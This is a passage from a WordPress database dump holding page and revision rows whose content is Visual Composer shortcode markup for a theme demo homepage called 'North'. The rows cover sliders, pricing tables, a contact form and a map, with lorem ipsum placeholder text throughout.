ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home9','','publish','open','open','','home9','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=728',0,'page','',0),(1924,1,'2014-07-15 13:18:48','2014-07-15 13:18:48','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"The goods you need now\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dots\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709987402{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709992519{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710000236{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506326298{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773992514{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582a\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582a\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582a\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405454385261{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home9','','inherit','closed','closed','','728-revision-v1','','','2014-07-15 13:18:48','2014-07-15 13:18:48','',728,'http://highperformingstudent.com/2014/07/15/728-revision-v1/',0,'revision','',0),(745,1,'2014-07-15 19:42:33','2014-07-15 19:42:33','[vc_row css=\".vc_custom_1405453516277{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WELCOME TO NORTH,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs 